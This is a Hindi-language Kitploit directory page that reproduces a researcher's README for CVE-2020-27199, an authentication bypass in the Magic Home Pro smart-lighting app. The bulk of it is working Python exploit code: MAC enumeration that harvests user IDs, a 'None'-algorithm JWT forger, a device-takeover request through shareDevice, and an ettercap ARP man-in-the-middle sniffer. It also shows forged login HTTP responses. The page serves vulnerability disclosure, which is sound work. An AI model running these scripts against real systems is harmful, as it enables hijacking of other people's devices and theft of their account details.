Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-27199 — CVE-2020-27199 | Kitploit
उपकरण/GitHubGitHub/9lyph/cve-2020-27199
टोहीIoT सुरक्षाशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगमोबाइल सुरक्षाप्रमाणीकरणपेलोड डेवलपमेंट
GitHub9lyph/cve-2020-27199

CVE-2020-27199

CVE-2020-27199

711 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2020-27199 (मैजिक होम प्रो - प्रमाणीकरण बायपास)

magic-home-pro

मैजिक होम प्रो मोबाइल एप्लिकेशन में कई कमजोरियां पाई गईं, जिसका उपयोग JadeHomic LED स्ट्रिप RGB किट के साथ इंटरफेस करने के लिए किया जाता है। इन कमजोरियों में सबसे महत्वपूर्ण एक प्रमाणीकरण बायपास (CVE-2020-27199) कमजोरी है, जो अंततः पीड़ित के पूरे डिवाइस समूह पर पूर्ण अधिग्रहण और नियंत्रण की अनुमति देती है।

  • नीचे गणना चरणों का विवरण दिया गया है जो अंतिम शोषण और PoC सामग्री की ओर ले जाते हैं, जिनका उपयोग गणना और अंतिम शोषण को लागू करने के लिए किया जाता है।

PoC फ़ाइलें

magichome-forge.py - JWT जालसाज, उपकरण अधिग्रहण को स्वचालित करने के लिए प्रयुक्त

magichome-sniffer.py - स्थानीय नेटवर्क स्निफर जो संवेदनशील उपकरणों के लिए नेटवर्क खोजता है। उन उपकरणों की एक सूची बनाता है जिनके विरुद्ध हमले चलाए जा सकते हैं

magichome-switch.py - उपकरणों को चालू करने की अनुमति देता है

magichome-takeover.py - पेलोड जो उपयोगकर्ता खाते के सफल अधिग्रहण की अनुमति देता है

खोजने के लिए प्रारंभिक कार्य

  • रूटेड एंड्रॉइड
  • पैचिंग, JAR के पुनः हस्ताक्षर और APK के पुनर्निर्माण के माध्यम से रूट डिटेक्शन बायपास (आवश्यक)
  • सर्टिफिकेट पिनिंग बायपास Frida बचाव के लिए (आवश्यक)

एप्लिकेशन

Magic Home Pro

उत्पाद का विक्रेता

JadeHomic

WiFi नियंत्रक उत्पाद स्वामी

Suzhou SmartChip Semiconductor Co.,Ltd

विक्रेता वेबसाइट

JadeHomic

संदर्भ

Mitre

Exploit-db

SpiderLabs Blog

प्रभावित उत्पाद कोड आधार

Magic Home Pro

विवरण

आधार URL: wifij01us.magichue.net

गणना

यह कमजोरी किसी भी प्रमाणित उपयोगकर्ता को अपने वर्तमान प्राधिकरण स्तर का उपयोग करके उन समापन बिंदुओं की पूछताछ करने की अनुमति देती है जो उनके पंजीकृत उत्पादों का हिस्सा नहीं हैं, /app/getBindedUserListByMacAddress/ZG001?macAddress=<mac address> पर API कॉल का उपयोग करके। इसके परिणामस्वरूप एक HTTP प्रतिक्रिया होती है जो समापन बिंदु के अस्तित्व को इंगित करती है और उससे जुड़े समापन बिंदु का उपयोगकर्ता नाम, उपयोगकर्ता अद्वितीय पहचानकर्ता (userUniID) और बाइंडेड अद्वितीय आईडी (bindedUniID) लौटाती है।

उपरोक्त पूछताछ का उपयोग करके, एक हमलावर नए गणना किए गए मैक पते का उपयोग करके API /app/sendCommandBatch/ZG001 पर एक अनधिकृत POST अनुरोध का उपयोग कर सकता है, ताकि संगत हेक्स कमांड 71230fa3 और 71240fa4 का उपयोग करके रिमोट एंडपॉइंट पर कमांड भेजे, जिसके परिणामस्वरूप क्रमशः चालू और बंद होता है।

उपरोक्त एकत्रित विवरणों पर आधारित JWT जालसाजी

प्रारंभिक गणना पूरी होने के बाद, JWT पेलोड डेटा में userID और uniID का उपयोग करके JWT को जाली बनाना भी संभव है, प्रभावी रूप से JWT हेडर सेक्शन में एल्गोरिदम के रूप में 'None' का उपयोग करने के लिए टोकन को डाउनग्रेड करना (हस्ताक्षर-बायपास कमजोरी)। इस कमजोरी का उपयोग करके, एप्लिकेशन एक हमलावर द्वारा डिवाइस अधिग्रहण के लिए संवेदनशील है, /app/shareDevice/ZG001 पर रिमोट API कॉल का उपयोग करके और friendUserID JSON पैरामीटर का उपयोग करके डिवाइस को हमलावर की डिवाइस सूची में जोड़ा जाता है, जिससे हमलावर को एंडपॉइंट डिवाइस पर पूर्ण नियंत्रण मिल जाता है।

Credit(s):

  • Medium
  • JWT_TOOL - ticarpi

कमजोरी का प्रकार

  • प्रमाणीकरण बायपास
  • सूचना प्रकटीकरण
  • अनधिकृत पहुंच
  • क्षैतिज विशेषाधिकार वृद्धि

अतिरिक्त जानकारी

OUI

OUI किसी संगठन को पंजीकृत MAC पतों के लिए संगठन अद्वितीय पहचानकर्ता का वर्णन करता है। JadeHomic के मामले में मैजिक OUI C8:2E:47 है, जहां पहले तीन बाइट्स निर्माता के अनुरूप हैं और दूसरे 3 बाइट्स निर्माता द्वारा निर्दिष्ट सीरियल नंबर के अनुरूप हैं। हमारे मामले में निर्माता पहचानकर्ता Suzhou SmartChip Semiconductor Co., LTD को पंजीकृत है।

CVE का अन्य प्रभाव

मैजिक होम प्रो मोबाइल एप्लिकेशन के प्रमाणीकरण बायपास की अनुमति देता है और इस प्रकार पीड़ित उपयोगकर्ता के पूरे डिवाइस समूह पर पूर्ण नियंत्रण प्राप्त होता है।

हमले के वेक्टर

  • प्रमाणित उपयोगकर्ता आवश्यक
  • मौजूदा अंत प्रणाली की सफल गणना
  • बाद में एक रिमोट एंडपॉइंट पर बैच कमांड भेजना
  • डिवाइस अधिग्रहण
  • प्रमाणीकरण बायपास

PoC गणक और बैच कमांड शोषण

प्रूफ ऑफ कॉन्सेप्ट MAC रेंज के अंतिम बाइट्स पर गणना करता है और परिणाम लौटाता है। यदि आप साहसी महसूस कर रहे हैं तो यह 'रिमोट एक्ज़ीक्यूट' का परीक्षण करने की अनुमति देता है।``` import requests import json import os from colorama import init from colorama import Fore, Back, Style import re

'''

  1. First Stage Authentication
  2. Second Stage Enumerate
  3. Third Stage Remote Execute '''

global found_macaddresses found_macaddresses = [] global outtahere outtahere = "" q = "q" global token

def turnOn(target, token):

root@kitploit:~
urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
array = {
    "dataCommandItems":[
        {"hexData":"71230fa3","macAddress":target}
    ]
}
data = json.dumps(array)
headersOn = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}
print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOn, data=data, headers=headersOn)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On")
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def turnOff(target, token):

root@kitploit:~
urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
array = {
    "dataCommandItems":[
        {"hexData":"71240fa4","macAddress":target}
    ]
}
data = json.dumps(array)
headersOff = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}
print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOff, data=data, headers=headersOff)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off")
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def lighItUp(target, token):

root@kitploit:~
outtahere = ""
q = "q"
if len(str(target)) < 12:
    print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()):
    while outtahere.lower() != q.lower():
        if outtahere == "0":
            turnOn(target, token)
        elif outtahere == "1":
            turnOff(target, token)
        outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)

def Main(): urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"

root@kitploit:~
data = {
    "userID":"<Valid Registered Email/Username>",
    "password":"<Valid Registered Password>",
    "clientID":""
}

headersAuth = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

# First Stage Authenticate

os.system('clear')
print (Fore.WHITE + "[+] Authenticating ...")
response = requests.post(urlAuth, json=data, headers=headersAuth)
resJsonAuth = response.json()
token = (resJsonAuth['token'])

# Second Stage Enumerate

print (Fore.WHITE + "[+] Enumerating ...")
macbase = "C82E475DCE"
macaddress = []
a = ["%02d" % x for x in range(100)]
for num in a:
    macaddress.append(macbase+num)

with open('loot.txt', 'w') as f:
    for mac in macaddress:
        urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001"
        params = {
            "macAddress":mac
        }

        headersEnum = {
            "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
            "Accept-Language": "en-US",
            "Content-Type": "application/json; charset=utf-8",
            "Accept": "application/json",
            "token": token,
            "Host": "wifij01us.magichue.net",
            "Connection": "close",
            "Accept-Encoding": "gzip, deflate"
        }

        response = requests.get(urlEnum, params=params, headers=headersEnum)
        resJsonEnum = response.json()
        data = (resJsonEnum['data'])
        if not data:
            pass
        elif data:
            found_macaddresses.append(mac)
            print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}")
            f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n")
        else:
            print (Fore.RED + "[-] No results found!")
            print(Style.RESET_ALL)

    if not found_macaddresses:
        print (Fore.RED + "[-] No MAC addresses retrieved")
    elif found_macaddresses:
        attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
        if (attackboolean.upper() == 'Y'):
            target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
            lighItUp(target, token)
        elif (attackboolean.upper() == 'N'):
            print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL)
        else:
            print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)

if name == "main": Main()

root@kitploit:~
#### गणना

![](https://assets.kitploit.com/production/public/readmes/14851/313dec37a245a36b311ba83f9bf03637209ab4b4bf5b0b51c283e53618544cfc.jpg)

#### टोकन फोर्जिंग

##### PoC टोकन फोर्जर

- सफल गणना पर प्राप्त **userID** और **uniqID** का उपयोग करके। यह PoC टोकन फोर्जर, एक नया हस्ताक्षरित बायपास जेडब्ल्यूटी उत्पन्न करता है।```
#!/usr/local/bin/python3

import url64
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re
import time
from wsgiref.handlers import format_date_time
from datetime import datetime
from time import mktime

now = datetime.now()
stamp = mktime(now.timetuple())

'''
HTTP/1.1 200
Server: nginx/1.10.3
Content-Type: application/json;charset=UTF-8
Connection: close

"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
'''

def Usage():
    print (f"Usage: {sys.argv[0]} <username> <unique id>")

def Main(user, uniqid):
    os.system('clear')
    print ("[+] Encoding ...")
    print ("[+] Bypass header created!")
    print ("HTTP/1.1 200")
    print ("Server: nginx/1.10.3")
    print ("Date: "+str(format_date_time(stamp))+"")
    print ("Content-Type: application/json;charset=UTF-8")
    print ("Connection: close\r\n\r\n")

    jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
    jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}'
    jwt_headerEncoded = url64.encode(jwt_header.strip())
    jwt_dataEncoded = url64.encode(jwt_data.strip())
    jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".")
    print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        Usage()
    else:
        Main(sys.argv[1], sys.argv[2])

उपकरण अधिग्रहण

  • उपकरण को अपने कब्ज़े में लेने के लिए शोषण, जो हमलावर के ईमेल (एक पंजीकृत खाता जिसका उपयोग लक्ष्य खाते पर कब्ज़ा करने के लिए किया जाएगा), लक्ष्य ईमेल (जिस खाते को अधिगृहीत किया जाना है), लक्ष्य मैक पता (लक्ष्य ईमेल पते से संबद्ध) और जाली टोकन का उपयोग करता है।
उपकरण अधिग्रहण शोषण का प्रमाण (PoC)```

#!/usr/local/bin/python3

import url64 import requests import json import sys import os from colorama import init from colorama import Fore, Back, Style import re

def Usage(): print (f"Usage: {sys.argv[0]} ")

def Main():

root@kitploit:~
attacker_email = sys.argv[1]
target_email = sys.argv[2]
target_mac = sys.argv[3]
forged_token = sys.argv[4]

os.system('clear')
print (Fore.WHITE + "[+] Sending Payload ...")
url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"

array = {"friendUserID":attacker_email, "macAddress":target_mac}

data = json.dumps(array)

headers = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":forged_token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

response = requests.post(url, data=data, headers=headers)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
    else:
        print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)

if name == "main": if len(sys.argv) < 5: Usage() else: Main()

root@kitploit:~
##### सफल POST अनुरोध/प्रतिक्रिया विनिमय का उदाहरण```
POST Request

POST /app/shareDevice/ZG001 HTTP/1.1
User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)
Accept-Language: en-US
Accept: application/json
token: <forged token, representing the target victim>
Content-Type: application/json; charset=utf-8
Content-Length: 72
Host: wifij01us.magichue.net
Connection: close
Accept-Encoding: gzip, deflate

{"friendUserID":"<attackercontrolled email>","macAddress":"<victim mac address>"}

Response

HTTP/1.1 200 
Server: nginx/1.10.3
Date: Tue, 07 Jul 2020 05:31:33 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 31

{"code":0,"msg":"","data":true}

मैजिक होम डिवाइस स्निफ़र

  • आवश्यकताएँ:
    • ettercap
    • वैध उपयोगकर्ता क्रेडेंशियल्स
  • उद्देश्य इस स्क्रिप्ट को उस नेटवर्क सेगमेंट के विरुद्ध चलाना है जिसमें आप अतिसंवेदनशील डिवाइस खोजने में रुचि रखते हैं।
  • एक बार मिल जाने पर, स्क्रिप्ट के भीतर हमला मेनू का उपयोग करके एक हमला चलाएं।``` #!/usr/bin/env python3

import socket import struct import platform import os import sys import requests import json from colorama import init from colorama import Fore, Back, Style import re import time, subprocess

loot = [] global choice choice = '' global outtahere outtahere = "" q = "q" global macAddress

def scan(): with open('sniffedDevices.txt', 'a+') as f: os.system('clear') print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL ) print (Fore.GREEN + "| Author: Victor Hanna (@9lyph) |"+ Style.RESET_ALL ) print (Fore.GREEN + "| Description: Magic Home Pro Sniffer |"+ Style.RESET_ALL ) print (Fore.GREEN + "| (CTRL^C to Quit) |"+ Style.RESET_ALL ) print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL ) print (Fore.WHITE + '[+] Configuring IP Forwarding'+ Style.RESET_ALL ) time.sleep(5) print (Fore.WHITE + '[+] Setting up MiTM'+ Style.RESET_ALL ) time.sleep(2) ipForward = subprocess.Popen('sudo echo 1 > /proc/sys/net/ipv4/ip_forward', shell=True) time.sleep(2) ettercap = subprocess.Popen('sudo ettercap -T -q -i eth0 -M arp /// > /dev/null &', shell=True) time.sleep(2) print (Fore.WHITE + '[+] Searching for Magic Home Device(s)'+ Style.RESET_ALL ) itsthere = [] while (True): conn = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003)) try: raw_data, addr = conn.recvfrom(65535) dst_mac, src_mac, proto, data = ethernet_frame(raw_data) if 'FF:FF:FF:FF:FF:FF' in dst_mac: # Suppress Broadcast traffic pass elif 'c8:2e:47'.upper() in src_mac: if src_mac in loot: pass else: print (Fore.WHITE + '[+] Device ' + src_mac + ' added to loot !'+ Style.RESET_ALL) loot.append(src_mac) f.write(src_mac + "\n") elif 'c8:2e:47'.upper() in dst_mac: if dst_mac in loot: pass else: print (Fore.WHITE + '[+] Device ' + dst_mac + ' added to loot !'+ Style.RESET_ALL) loot.append(dst_mac) f.write(dst_mac + "\n") else: pass except KeyboardInterrupt: print (Fore.WHITE + "[+] Stopping MiTM"+ Style.RESET_ALL) time.sleep(2) subprocess.Popen.kill(ettercap) print (Fore.WHITE + '[+] Reconfiguring IP Forwarding'+ Style.RESET_ALL) time.sleep(2) os.system('sudo echo 0 > /proc/sys/net/ipv4/ip_forward') menu()

def turnOn(target, token): urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001" array = { "dataCommandItems":[ {"hexData":"71230fa3","macAddress":target} ] }

root@kitploit:~
data = json.dumps(array)

headersOn = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOn, data=data, headers=headersOn)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Fore.WHITE + f"{target}" + Fore.GREEN + " Switched On" + Style.RESET_ALL)
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def turnOff(target, token): urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"

root@kitploit:~
array = {
    "dataCommandItems":[
        {"hexData":"71240fa4","macAddress":target}
    ]
}

data = json.dumps(array)
headersOff = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOff, data=data, headers=headersOff)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Fore.WHITE + f"{target}" + Fore.GREEN + " Switched Off" + Style.RESET_ALL)
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def lighItUp(target, token): outtahere = "" q = "q" if len(str(target)) < 12: print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL) elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()): print (outtahere.lower()) while outtahere.lower() != q.lower(): if outtahere == "0": turnOn(target, token) elif outtahere == "1": turnOff(target, token) outtahere = input(Fore.GREEN + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL) menu()

def attack(): with open('sniffedDevices.txt', 'rb') as f: os.system('clear') print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL) print (Fore.GREEN + "| Author: Victor Hanna (@9lyph) |"+ Style.RESET_ALL) print (Fore.GREEN + "| Description: Magic Home Pro Sniffer |"+ Style.RESET_ALL) print (Fore.GREEN + "| Attack Device : '1' |"+ Style.RESET_ALL) print (Fore.GREEN + "| Exit to Main Menu: '2' |"+ Style.RESET_ALL) print (Fore.GREEN + "| (CTRL^C to Quit) |"+ Style.RESET_ALL) print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL) print (Fore.WHITE + "[+] These are you available local targets:"+ Style.RESET_ALL) alreadyDone = [] for target in f.readlines(): macAddresses = ((target).replace(b":", b"")) if macAddresses in alreadyDone: continue else: alreadyDone.append(macAddresses) print (target.replace(b":", b"").decode('utf-8').strip())

root@kitploit:~
    choice = int(input ("Choice: "))
    if (choice == 1):
        macAddress = input("[+] Enter Device MAC (xxxxxxxxxxxx): ")
        urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"

        data = {
            "userID":"<!--Valid Username-->",
            "password":"<!--Valid Password-->",
            "clientID":""
        }

        headersAuth = {
            "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
            "Accept-Language": "en-US",
            "Accept": "application/json", 
            "Content-Type": "application/json; charset=utf-8",
            "Host": "wifij01us.magichue.net",
            "Connection": "close",
            "Accept-Encoding": "gzip, deflate"
        }
        print (Fore.WHITE + "[+] Authenticating ...")
        response = requests.post(urlAuth, json=data, headers=headersAuth)
        resJsonAuth = response.json()
        token = (resJsonAuth['token'])
        lighItUp(macAddress, token)
    elif (choice == 2):
        menu()
    else:
        attack()

def ethernet_frame(data): dst_mac, src_mac, proto = struct.unpack('!6s6sH', data[:14]) return get_mac_addr(dst_mac), get_mac_addr(src_mac), socket.htons(proto), data[14:]

def get_mac_addr(bytes_addr): bytes_str = map('{:02x}'.format, bytes_addr) return ':'.join(bytes_str).upper()

def menu(): os.system('clear') while (True):

root@kitploit:~
    print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Author: Victor Hanna (@9lyph)       |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Description: Magic Home Pro Sniffer |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Scan   : '1'                        |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Attack : '2'                        |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| (CTRL^C to Quit)                    |"+ Style.RESET_ALL)
    print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL)
    try:
        choice = (input ("Choice: "))
        if (int(choice) == 1):
            scan()
        elif (int(choice) == 2):
            attack()
    except KeyboardInterrupt:
        os.system ('sudo echo 0 > /proc/sys/net/ipv4/ip_forward')
        print("\nBye bye !\n")
        sys.exit()

if name == 'main': menu()

root@kitploit:~
### प्रमाणीकरण बायपास (मैजिक होम प्रो) (CVE-2020-27199)
 
- उपरोक्त गणना के आधार पर प्राप्त जानकारी अर्थात पीड़ित का ईमेल, क्लाइंटआईडी और यूनिकआईडी के साथ JSON टोकन जालसाजी का उपयोग करके, HTTP प्रतिक्रिया में हेरफेर करके मोबाइल ऐप प्रमाणीकरण प्रक्रिया को बायपास करना संभव है, जिससे हमलावर पीड़ित के रूप में एप्लिकेशन तक पहुंच प्राप्त कर सकता है।

- हमलावर मैजिक होम प्रो एप्लिकेशन का उपयोग करता है, जिसमें पीड़ित का ईमेल पता, कोई भी पासवर्ड और क्लाइंटआईडी का उपयोग किया जाता है।

- इसके बाद हमलावर चरण 1 में दिए गए विवरणों का उपयोग करके HTTP प्रतिक्रिया में हेरफेर कर सकता है, जिससे बायपास हो सके।```
Original HTTP Login Request via Magic Home Pro Mobile app
 
POST /app/login/ZG001 HTTP/1.1
User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)
Accept-Language: en-US
Accept: application/json
token:
Content-Type: application/json; charset=utf-8
Content-Length: 117
Host: wifij01us.magichue.net
Connection: close
Accept-Encoding: gzip, deflate
 
{"userID":"<victim userID>","password":"<arbitrary password>","clientID":"<arbitrary ClientID>"}

Original HTTP Response
 
HTTP/1.1 200
Server: nginx/1.10.3
Date: Thu, 08 Oct 2020 00:08:45 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 37
 
{"code":10033,"msg":"Password error"}

Edited HTTP Response
 
HTTP/1.1 200
Server: nginx/1.10.3
Date: Mon, 06 Jul 2020 12:32:02 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 907
 
{"code":0,"msg":"","data":{"webApi":"wifij01us.magichue.net/app","webPathOta":"http://wifij01us.magichue.net/app/ota/download","tcpServerController":"TCP,8816,ra8816us02.magichue.net","tcpServerBulb":"TCP,8815,ra8815us02.magichue.net","tcpServerControllerOld":"TCP,8806,mhc8806us.magichue.net","tcpServerBulbOld":"TCP,8805,mhb8805us.magichue.net","sslMqttServer":"ssl://192.168.0.112:1883","serverName":"Global","serverCode":"US","userName":"<victim userID>","userEmail":"<victim email>","userUniID":"<uniID gleaned from enumeration>"},"token":"<forged JWT based on gleaned data from API call>"}

वीडियो एक्सप्लॉइट PoC

Magic Home PRO - Exploit

खोजकर्ता/श्रेय:

Victor Hanna of Exploit Security

मुझे फॉलो करें

Mastodon Linkedin Youtube

टूल डाउनलोड करें